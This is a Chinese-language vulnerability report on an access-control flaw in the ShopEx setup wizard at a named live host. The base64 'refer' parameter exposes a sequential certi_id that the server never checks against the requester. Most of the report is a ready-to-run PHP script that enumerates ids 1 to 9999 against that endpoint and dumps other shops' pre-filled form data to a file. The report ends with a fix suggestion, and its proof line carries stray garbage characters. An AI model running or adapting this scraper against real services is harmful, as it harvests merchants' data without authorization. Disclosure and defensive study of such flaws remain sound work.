简要描述:
ShopEx 某接口缺陷，可遍历所有使用该程序的网站
详细说明:
问题出现在 ShopEx 网店使用向导页面（guide.ecos.shopex.cn）。
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站：certi_id 是一个可预测的顺序整数，从结果看服务端在返回向导页面前并未校验请求者是否有权访问该 id 对应站点的数据（典型的不安全直接对象引用 / IDOR）。
<?php
// Sweep certi_id 1..9999 and dump the wizard form fields for each hit.
foreach (range(1, 9999) as $certiId) {
    ShowshopExD($certiId);
}
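function ShowshopExD($cid) {
    // Fetch the ShopEx setup-wizard step for one certi_id and dump the
    // pre-filled text inputs ("name:value") to stdout and c:/shopEx.txt.
    //
    // The wizard identifies the shop only by certi_id, a small sequential
    // integer carried inside the base64 "refer" query parameter, so the
    // caller can request any id. Proof-of-concept only: run it solely
    // against systems you are authorized to test.
    //
    // $cid: certi_id to request; coerced with intval().
    // Returns nothing; prints and appends to the output file on a hit.
    $url = 'http://guide.ecos.shopex.cn/step2.php';
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');
    // base64 output contains '+', '/' and '=', which are not safe in a raw
    // query string ('+' decodes to a space). Encode it so the server sees
    // exactly $refer and the echo check below can match it.
    $url .= '?refer=' . urlencode($refer);

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // Without a timeout a single unresponsive request stalls the whole sweep.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $result = curl_exec($ch);
    $err = curl_error($ch);
    curl_close($ch);

    if ($result === false) {
        // Report transport errors instead of silently treating them as "no hit".
        echo 'certi_id ' . intval($cid) . ': request failed: ' . $err . "\r\n";
        flush();
        return;
    }

    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // strpos() returns 0 when the needle sits at offset 0; the original
    // truthiness test would have discarded such a page. Compare strictly.
    if (strpos($result, $refer) !== false) {
        $fp = fopen("c:/shopEx.txt", 'ab'); // append results
        if ($fp === false) {
            echo "cannot open c:/shopEx.txt for append\r\n";
            flush();
            return;
        }

        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $key) {
            // Only the first name/value pair of each input is used; skip
            // inputs that lack one instead of reading an undefined index.
            if (!preg_match('/name="(.*?)"(.*?)value="(.*?)"/', trim($key), $res)) {
                continue;
            }
            $col = $res[1] . ':' . $res[3] . "\r\n";
            echo $col;
            fwrite($fp, $col, strlen($col));
        }

        echo '--------------------------------' . "\r\n";
        fclose($fp);
    }

    flush();
}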
?>
漏洞证明:& r6 T7 @8 P- S2 J! U0 U
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议：refer 换成其他加密方式——但仅更换编码或加密只是提高猜测难度，根本修复是在服务端校验当前会话是否有权访问所请求的 certi_id。